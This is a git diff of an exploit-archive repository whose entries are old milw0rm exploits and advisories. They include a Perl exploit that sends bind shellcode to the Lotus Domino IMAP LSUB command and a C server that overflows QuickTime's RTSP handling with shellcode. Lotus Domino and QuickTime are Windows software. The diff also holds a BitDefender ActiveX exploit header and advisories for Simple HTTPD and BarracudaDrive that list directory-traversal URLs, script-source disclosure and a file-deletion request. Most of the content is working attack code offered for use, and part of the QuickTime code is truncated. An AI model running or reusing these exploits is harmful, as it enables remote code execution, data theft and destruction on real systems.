universal on Lotus Domino 7.0.2FP1 + + +# +# Shellcode +# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) +# +# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444) +# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP) +# +$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI". + "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS". + "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV". + "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3". + "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo". + "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo". + "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp". 
+ "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc". + "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M". + "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70". + "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs". + "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA"; + +# +# JUMP to 'ESP adjustment' and shellcode +# +$jmp = "\x74\x20". # JE SHORT + "\x75\x20"; # JNZ SHORT + + +# +# +# Don't edit anything after this line +# +# + +$sc_limit = 2300; + +sub usage { + print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n". + "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n". + "\n". + "Targets:\n". + "[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n". + "[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n"; + exit; +} + + +# Net::IP::ip_is_ipv4 +sub ip_is_ipv4 { + my $ip = shift; + + unless ($ip =~ m/^[\d\.]+$/) { + return 0; + } + + if ($ip =~ m/^\./) { + return 0; + } + + if ($ip =~ m/\.$/) { + return 0; + } + + if ($ip =~ m/^(\d+)$/ and $1 < 256) { + return 1 + } + + my $n = ($ip =~ tr/\./\./); + + unless ($n >= 0 and $n < 4) { + return 0; + } + + if ($ip =~ m/\.\./) { + return 0; + } + + foreach (split /\./, $ip) { + unless ($_ >= 0 and $_ < 256) { + return 0; + } + } + + return 1; +} + + +print "--------------------------------------------------------\n". + ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n". + "--------------------------------------------------------\n\n"; + +if( ($#ARGV+1) != 4 ) { + &usage; +} + +$user = $ARGV[2]; +$pass = $ARGV[3]; + +# Windows 2000 SP4 +if( $ARGV[0] == 1 ) { + $popad = "\x41" x 3 . # INC ECX + "\x61" x 51; # POPAD +} +# Windows 2003 SP2 +elsif( $ARGV[0] == 2 ) { + $popad = "\x41" x 2 . 
# INC ECX + "\x61" x 52; # POPAD +} +else { + &usage; +} + +if( ip_is_ipv4( $ARGV[1] ) ) { + $ip = $ARGV[1]; +} +else +{ + &usage; +} + +if( length( $sc ) > $sc_limit ) { + print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n"; + exit; +} + +print "[+] Connecting to $ip:$port...\n"; + +$sock = IO::Socket::INET->new ( + PeerAddr => $ip, + PeerPort => $port, + Proto => 'tcp', + Timeout => 2 +) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit; + +print "[+] Connected.\n"; + +$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000; +$sock->recv( $recv, 1024 ); +$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" ); +$sock->recv( $recv, 1024 ); + +if( $recv ne "a001 OK LOGIN completed\r\n" ) { + print "[-] Error: Invalid username or password!\n"; + exit; +} + +print "[+] Successfully logged in.\n". + "[+] Trying to overwrite and control the SE handler...\n"; + +$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" ); +$sock->recv( $recv, 1024 ); +$sock->send( "$mailbox\r\n" ); +$sock->recv( $recv, 1024 ); +$sock->send( "a003 LSUB arg1 arg2\r\n" ); +sleep( 3 ); +close( $sock ); + +print "[+] Done. Now check for a bind shell on $ip:4444!\n"; + +# milw0rm.com [2007-10-27] diff --git a/platforms/windows/remote/4579.html b/platforms/windows/remote/4579.html index 78a7fcfd1..2d6f839a4 100755 --- a/platforms/windows/remote/4579.html +++ b/platforms/windows/remote/4579.html @@ -1,69 +1,69 @@ - - - - - - -# milw0rm.com [2007-10-29] + + + + + + +# milw0rm.com [2007-10-29] diff --git a/platforms/windows/remote/4594.html b/platforms/windows/remote/4594.html index ed50365b5..5472b43df 100755 --- a/platforms/windows/remote/4594.html +++ b/platforms/windows/remote/4594.html @@ -1,44 +1,44 @@ - - - - - - - -# milw0rm.com [2007-11-01] + + + + + + + +# milw0rm.com [2007-11-01] diff --git a/platforms/windows/remote/4598.html b/platforms/windows/remote/4598.html index ab24c026c..53be29945 100755 
--- a/platforms/windows/remote/4598.html
+++ b/platforms/windows/remote/4598.html
@@ -1,31 +1,31 @@
-
    ------------------------------------------------------------------------------------------------------
    - EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
    - url: http://www.anydraw.com
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    ------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -# milw0rm.com [2007-11-02]
    +
    +-----------------------------------------------------------------------------------------------------
    + EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
    + url: http://www.anydraw.com
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +-----------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +# milw0rm.com [2007-11-02]
    diff --git a/platforms/windows/remote/4651.cpp b/platforms/windows/remote/4651.cpp
    index c46dcb294..61fb06cf7 100755
    --- a/platforms/windows/remote/4651.cpp
    +++ b/platforms/windows/remote/4651.cpp
@@ -1,265 +1,265 @@ -/* -============================================================= -Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec -============================================================= -Discovered by: h07 -Author: InTeL -*Tested on: - - Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec - - Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec - - - Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec - - Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec - - -Notes: - [*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :) - [*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH - Restrictions in XP and in Vista!! so we use Addys from there. - [*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations - Since I didnt feel like wasting my time going through all the filtered Characters, go through it yourself. - - Here are some \x4b, \x59, \x79 - [*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation - in the shellcode - [*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs - - [***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit. 
- http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html - cough use w/ an iframe cough - - Shoutz: UIA, u kno who u ppl are -*/ - - -#include -#include -#include -#include -#pragma comment(lib,"wsock32.lib") - -int info(); - -#define port 554 - -char header_part1[] = -"RTSP/1.0 200 OK\r\n" -"CSeq: 1\r\n" -"Date: 0x00 :P\r\n" -"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n" -"Content-Type: "; - -char header_part2[] = -"Content-Length: "; - -char body[] = -"v=0\r\n" -"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" -"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n" -"i=1.mp3\r\n" "t=0 0\r\n" -"a=tool:ciamciaramcia\r\n" -"a=type:broadcast\r\n" -"a=control:*\r\n" -"a=range:npt=0-213.077\r\n" -"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n" -"a=x-qt-text-inf:1.mp3\r\n" -"m=audio 0 RTP/AVP 14\r\n" -"c=IN IP4 0.0.0.0\r\n" -"a=control:track1\r\n"; - -//Place Your Shellcode here but keep the name -char scode[] = -"\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" -"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7" -"\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15" -"\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f" -"\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7" -"\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42" -"\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a" -"\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30" -"\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6" -"\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35" -"\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96"; - - -int main(int argc, char *argv[]) -{ - char evilbuf[5200], recvbuf[512]; - char *strptr = NULL; - char contentlength[] = "327"; - int i, pos; - struct sockaddr_in saddr; - WSADATA wsaData; - SOCKET sock, vicsock; - - info(); - if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){ - printf("Unable to initialize Winsock \n"); - 
exit(1); - } - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { - printf("Socket Error \n"); - WSACleanup(); - exit(1); - } - - memset(&saddr, 0, sizeof(saddr)); - saddr.sin_family = AF_INET; - saddr.sin_addr.s_addr = INADDR_ANY; - saddr.sin_port = htons(port); - - if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) { - printf("Bind Error \r\n"); - closesocket(sock); - WSACleanup(); - exit(1); - } - - if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) { - printf("Listen Error \r\n"); - closesocket(sock); - WSACleanup(); - exit(1); - } - printf("[+] Listening on port: %d\r\n", port); - if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) { - - printf("[+]Victim Connected \r\n"); - memset(recvbuf,0,sizeof(recvbuf)); - recv(vicsock, recvbuf, 512, 0); - - memset(evilbuf, '\0', sizeof(evilbuf)); - strcpy(evilbuf, header_part1); - - /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/ - - if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista - strptr = NULL; - - if((strptr =strstr(recvbuf, "7.3")) != NULL) { - printf("Victim is running Vista and QKTime Version 7.3\r\n"); - pos = strlen(header_part1); - for(i = 1; i<=991;i++) { - evilbuf[pos] = 'A'; - pos++; - } - strcat(evilbuf, "\xeb\x32\x90\x90"); - strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx - pos += 8; - } - else { - strptr = NULL; - if((strptr =strstr(recvbuf, "7.2")) != NULL) { - printf("Victim is running Vista and QKTime Version 7.2\r\n"); - pos = strlen(header_part1); - for(i = 1; i<=987;i++) { - evilbuf[pos] = 'A'; - pos++; - } - strcat(evilbuf, "\xeb\x32\x90\x90"); - strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx - pos += 8; - } - } - } - else { //Win XP SP2 - strptr = NULL; - if((strptr = strstr(recvbuf, "5.1")) != NULL) { - strptr = NULL; - if((strptr =strstr(recvbuf, "Pack 2")) != NULL) { - strptr = NULL; - if((strptr =strstr(recvbuf, 
"7.3")) != NULL) { - printf("Victim is running XP SP2 and QKTime Version 7.3\r\n"); - pos = strlen(header_part1); - for(i = 1; i<=991;i++) { - evilbuf[pos] = 'A'; - pos++; - } - strcat(evilbuf, "\xeb\x32\x90\x90"); - strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx - pos += 8; - } - else{ - strptr = NULL; - if((strptr =strstr(recvbuf, "7.2")) != NULL) { - printf("Victim is running XP SP2 and QKTime Version 7.2\r\n"); - pos = strlen(header_part1); - for(i = 1; i<=987;i++) { - evilbuf[pos] = 'A'; - pos++; - } - strcat(evilbuf, "\xeb\x32\x90\x90"); - strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx - pos += 8; - } - } - } - } - else { - printf("[-] Not a Valid Target, Shutting Down"); - closesocket(vicsock); - closesocket(sock); - WSACleanup(); - exit(1); - } - } - - for(i=0; i<200;i++) { - evilbuf[pos] = '\x90'; - pos++; - } - for(i=0; i +#include +#include +#include +#pragma comment(lib,"wsock32.lib") + +int info(); + +#define port 554 + +char header_part1[] = +"RTSP/1.0 200 OK\r\n" +"CSeq: 1\r\n" +"Date: 0x00 :P\r\n" +"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n" +"Content-Type: "; + +char header_part2[] = +"Content-Length: "; + +char body[] = +"v=0\r\n" +"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" +"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n" +"i=1.mp3\r\n" "t=0 0\r\n" +"a=tool:ciamciaramcia\r\n" +"a=type:broadcast\r\n" +"a=control:*\r\n" +"a=range:npt=0-213.077\r\n" +"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n" +"a=x-qt-text-inf:1.mp3\r\n" +"m=audio 0 RTP/AVP 14\r\n" +"c=IN IP4 0.0.0.0\r\n" +"a=control:track1\r\n"; + +//Place Your Shellcode here but keep the name +char scode[] = +"\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" +"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7" +"\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15" +"\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f" 
+"\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7" +"\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42" +"\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a" +"\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30" +"\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6" +"\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35" +"\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96"; + + +int main(int argc, char *argv[]) +{ + char evilbuf[5200], recvbuf[512]; + char *strptr = NULL; + char contentlength[] = "327"; + int i, pos; + struct sockaddr_in saddr; + WSADATA wsaData; + SOCKET sock, vicsock; + + info(); + if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){ + printf("Unable to initialize Winsock \n"); + exit(1); + } + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { + printf("Socket Error \n"); + WSACleanup(); + exit(1); + } + + memset(&saddr, 0, sizeof(saddr)); + saddr.sin_family = AF_INET; + saddr.sin_addr.s_addr = INADDR_ANY; + saddr.sin_port = htons(port); + + if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) { + printf("Bind Error \r\n"); + closesocket(sock); + WSACleanup(); + exit(1); + } + + if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) { + printf("Listen Error \r\n"); + closesocket(sock); + WSACleanup(); + exit(1); + } + printf("[+] Listening on port: %d\r\n", port); + if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) { + + printf("[+]Victim Connected \r\n"); + memset(recvbuf,0,sizeof(recvbuf)); + recv(vicsock, recvbuf, 512, 0); + + memset(evilbuf, '\0', sizeof(evilbuf)); + strcpy(evilbuf, header_part1); + + /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/ + + if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista + strptr = NULL; + + if((strptr =strstr(recvbuf, "7.3")) != NULL) { + printf("Victim is running Vista and QKTime Version 7.3\r\n"); + pos = strlen(header_part1); + 
for(i = 1; i<=991;i++) { + evilbuf[pos] = 'A'; + pos++; + } + strcat(evilbuf, "\xeb\x32\x90\x90"); + strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx + pos += 8; + } + else { + strptr = NULL; + if((strptr =strstr(recvbuf, "7.2")) != NULL) { + printf("Victim is running Vista and QKTime Version 7.2\r\n"); + pos = strlen(header_part1); + for(i = 1; i<=987;i++) { + evilbuf[pos] = 'A'; + pos++; + } + strcat(evilbuf, "\xeb\x32\x90\x90"); + strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx + pos += 8; + } + } + } + else { //Win XP SP2 + strptr = NULL; + if((strptr = strstr(recvbuf, "5.1")) != NULL) { + strptr = NULL; + if((strptr =strstr(recvbuf, "Pack 2")) != NULL) { + strptr = NULL; + if((strptr =strstr(recvbuf, "7.3")) != NULL) { + printf("Victim is running XP SP2 and QKTime Version 7.3\r\n"); + pos = strlen(header_part1); + for(i = 1; i<=991;i++) { + evilbuf[pos] = 'A'; + pos++; + } + strcat(evilbuf, "\xeb\x32\x90\x90"); + strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx + pos += 8; + } + else{ + strptr = NULL; + if((strptr =strstr(recvbuf, "7.2")) != NULL) { + printf("Victim is running XP SP2 and QKTime Version 7.2\r\n"); + pos = strlen(header_part1); + for(i = 1; i<=987;i++) { + evilbuf[pos] = 'A'; + pos++; + } + strcat(evilbuf, "\xeb\x32\x90\x90"); + strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx + pos += 8; + } + } + } + } + else { + printf("[-] Not a Valid Target, Shutting Down"); + closesocket(vicsock); + closesocket(sock); + WSACleanup(); + exit(1); + } + } + + for(i=0; i<200;i++) { + evilbuf[pos] = '\x90'; + pos++; + } + for(i=0; i - - - - - - - - -# milw0rm.com [2007-11-27] +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + BitDefender OScan8.ocx / Oscan81.ocx ActiveX Exploit + +=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! 
NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=- + +http://research.eeye.com/html/advisories/published/AD20071120.html +http://secunia.com/advisories/27717/ + + +This works not 100% - it corrupts random memory in the browser and Launches calculator with success. + +Users have had this installed since 2006! With no autoupdates :) + +Google Search of BD OSCAN = +http://www.google.com/search?hl=ar&safe=off&rls=fr&hs=P4T&q=%225D86DDB5-BDF9-441B-9E9E-D4730F4EE499%22&btnG=Search + +Modify the values in these to help keep it stable: +'SiteAuthority' - different memory address ?? - it turns values to literal address ! +while (SiteAuthority.length < 60000) - Maybe larger/smaller? + + +Crashes IE even if it fails + +Tested with Forum XSS Injections + Wordpress 0day + CMS Injections + +Nphinity +#SAMAH/#SYR/#SHAHADA +mesra.kl.my.dal.net + + + + +=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=- + + + + + + + + + + + + + +# milw0rm.com [2007-11-27] diff --git a/platforms/windows/remote/4700.txt b/platforms/windows/remote/4700.txt index aad483b70..d6ef7420f 100755 --- a/platforms/windows/remote/4700.txt +++ b/platforms/windows/remote/4700.txt 
@@ -1,105 +1,105 @@ -####################################################################### - - Luigi Auriemma - -Application: Simple HTTPD - http://shttpd.sourceforge.net -Versions: <= 1.38 -Platforms: Windows, *nix, QNX, RTEMS - only Windows seems vulnerable -Bugs: A] directory traversal - B] scripts and CGI viewing/downloading - (%20 char found by Shay priel in Jun 2007) -Exploitation: remote -Date: 07 Dec 2007 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - -Simple HTTPD (shttpd) is an open source web server created for embedded -systems. - - -####################################################################### - -======= -2) Bugs -======= - ----------------------- -A] directory traversal ----------------------- - -Using the "..\" pattern is possible to download any file in the disk on -which is located the web root directory. - - --------------------------------------- -B] scripts and CGI viewing/downloading --------------------------------------- - -Any script or CGI in the server can be viewed/downloaded instead of -being executed simply appending the chars '+', '.', %20 (this one -reported by Shay priel in the summer 2007), %2e and any other byte (in -hex format too) major than 0x7f to the requested filename. - - -Note that only Windows seems vulnerable to the above bugs. - - -####################################################################### - -=========== -3) The Code -=========== - - -A] -http://SERVER/..\..\..\boot.ini -http://SERVER/..\%2e%2e%5c..\boot.ini - -B] -http://SERVER/file.php+ -http://SERVER/file.php. 
-http://SERVER/file.php%80 -http://SERVER/file.php%ff - - -####################################################################### - -====== -4) Fix -====== - - -I have posted the problems in the shttpd-general mailing-list but there -is no reply yet: - - http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general - - -####################################################################### - - ---- -Luigi Auriemma -http://aluigi.org - -# milw0rm.com [2007-12-07] +####################################################################### + + Luigi Auriemma + +Application: Simple HTTPD + http://shttpd.sourceforge.net +Versions: <= 1.38 +Platforms: Windows, *nix, QNX, RTEMS + only Windows seems vulnerable +Bugs: A] directory traversal + B] scripts and CGI viewing/downloading + (%20 char found by Shay priel in Jun 2007) +Exploitation: remote +Date: 07 Dec 2007 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +Simple HTTPD (shttpd) is an open source web server created for embedded +systems. + + +####################################################################### + +======= +2) Bugs +======= + +---------------------- +A] directory traversal +---------------------- + +Using the "..\" pattern is possible to download any file in the disk on +which is located the web root directory. + + +-------------------------------------- +B] scripts and CGI viewing/downloading +-------------------------------------- + +Any script or CGI in the server can be viewed/downloaded instead of +being executed simply appending the chars '+', '.', %20 (this one +reported by Shay priel in the summer 2007), %2e and any other byte (in +hex format too) major than 0x7f to the requested filename. 
+ + +Note that only Windows seems vulnerable to the above bugs. + + +####################################################################### + +=========== +3) The Code +=========== + + +A] +http://SERVER/..\..\..\boot.ini +http://SERVER/..\%2e%2e%5c..\boot.ini + +B] +http://SERVER/file.php+ +http://SERVER/file.php. +http://SERVER/file.php%80 +http://SERVER/file.php%ff + + +####################################################################### + +====== +4) Fix +====== + + +I have posted the problems in the shttpd-general mailing-list but there +is no reply yet: + + http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general + + +####################################################################### + + +--- +Luigi Auriemma +http://aluigi.org + +# milw0rm.com [2007-12-07] diff --git a/platforms/windows/remote/4713.txt b/platforms/windows/remote/4713.txt index 3f3c9def2..552eaf3db 100755 --- a/platforms/windows/remote/4713.txt +++ b/platforms/windows/remote/4713.txt 
@@ -1,156 +1,156 @@ -####################################################################### - - Luigi Auriemma - -Application: BarracudaDrive Web Server - http://barracudaserver.com/products/BarracudaDrive/ - http://barracudaserver.com/products/HomeServer/ -Versions: <= 3.7.2 -Platforms: Windows -Bugs: A] directory traversal - B] scripts source visualization - C] arbitrary files deleting by users - D] NULL pointer crash in chat.ehintf by users - E] html injection in the trace viewer -Exploitation: remote -Date: 10 Dec 2007 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - -Barracuda Drive is a commercial webserver developed by Real Time Logic -and contains many features. - - -####################################################################### - -======= -2) Bugs -======= - ----------------------- -A] directory traversal ----------------------- - -A directory traversal vulnerability is exploitable through the usage of -a backslash or any other char major than 0x7f at the beginning of the -URI. -The directories must be delimited by backslashes (and not slashes) for -exploiting the bug. - - -------------------------------- -B] scripts source visualization -------------------------------- - -All the custom scripts in the server (like the LUA scripts with lsp -extension) can be visualized entirely instead of being executed simply -using a '+', a dot or any other char major than 0x7f after the script's -name. - - ------------------------------------- -C] arbitrary files deleting by users ------------------------------------- - -BarracudaDrive allows the admin to create users which can then access -their personal folders, chating between them and so on. 
-The problem here is that these authenticated users can delete files and -empty folders anywhere in the disk on which is located their personal -directory simply using the usual ..\ pattern. - -Note that is also possible to create directories in the disk using the -same trick but this is not a real security problem. - - ---------------------------------------------- -D] NULL pointer crash in chat.ehintf by users ---------------------------------------------- - -As already said the users can also chat between them using a simple -web interface called Group Chat. -In this case it's enough to avoid the passing of the Connection ID of -the user in the URI for crashing the entire server due to a NULL -pointer. - - -------------------------------------- -E] html injection in the trace viewer -------------------------------------- - -BarracudaDrive logs any bad or wrong HTTP request received by the -clients and the Trace page in the admin interface can be used to -visualize these log files. -The problem is that they are visualized as HTML and there are no checks -or limitations on their content so a remote attacker can use this bug -for injecting scripts in these files, for example for retrieving the -cookie of the admin and gaining access to the server configuration. - - -####################################################################### - -=========== -3) The Code -=========== - - -A] -http://SERVER/\..\..\..\boot.ini -http://SERVER/%80..\..\..\boot.ini -http://SERVER/%ff..\bdlicense.dat - -B] -http://SERVER/lua.lsp+ -http://SERVER/lua.lsp. -http://SERVER/lua.lsp%80 - -C] -POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1 -Host: SERVER -Cookie: "use the real user's cookie!" -Content-Type: application/x-www-form-urlencoded -Content-Length: 21 - -dir=..\..\..\file.txt - -D] -POST /eh/chat.ehintf/C. HTTP/1.1 -Host: SERVER -Content-Type: text/plain -Content-Length: 0 -Cookie: "use the real user's cookie!" 
- -E] -GET HTTP/1.0 - - -####################################################################### - -====== -4) Fix -====== - - -Version 3.8 - - -####################################################################### - -# milw0rm.com [2007-12-10] +####################################################################### + + Luigi Auriemma + +Application: BarracudaDrive Web Server + http://barracudaserver.com/products/BarracudaDrive/ + http://barracudaserver.com/products/HomeServer/ +Versions: <= 3.7.2 +Platforms: Windows +Bugs: A] directory traversal + B] scripts source visualization + C] arbitrary files deleting by users + D] NULL pointer crash in chat.ehintf by users + E] html injection in the trace viewer +Exploitation: remote +Date: 10 Dec 2007 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +Barracuda Drive is a commercial webserver developed by Real Time Logic +and contains many features. + + +####################################################################### + +======= +2) Bugs +======= + +---------------------- +A] directory traversal +---------------------- + +A directory traversal vulnerability is exploitable through the usage of +a backslash or any other char major than 0x7f at the beginning of the +URI. +The directories must be delimited by backslashes (and not slashes) for +exploiting the bug. + + +------------------------------- +B] scripts source visualization +------------------------------- + +All the custom scripts in the server (like the LUA scripts with lsp +extension) can be visualized entirely instead of being executed simply +using a '+', a dot or any other char major than 0x7f after the script's +name. 
+ + +------------------------------------ +C] arbitrary files deleting by users +------------------------------------ + +BarracudaDrive allows the admin to create users which can then access +their personal folders, chating between them and so on. +The problem here is that these authenticated users can delete files and +empty folders anywhere in the disk on which is located their personal +directory simply using the usual ..\ pattern. + +Note that is also possible to create directories in the disk using the +same trick but this is not a real security problem. + + +--------------------------------------------- +D] NULL pointer crash in chat.ehintf by users +--------------------------------------------- + +As already said the users can also chat between them using a simple +web interface called Group Chat. +In this case it's enough to avoid the passing of the Connection ID of +the user in the URI for crashing the entire server due to a NULL +pointer. + + +------------------------------------- +E] html injection in the trace viewer +------------------------------------- + +BarracudaDrive logs any bad or wrong HTTP request received by the +clients and the Trace page in the admin interface can be used to +visualize these log files. +The problem is that they are visualized as HTML and there are no checks +or limitations on their content so a remote attacker can use this bug +for injecting scripts in these files, for example for retrieving the 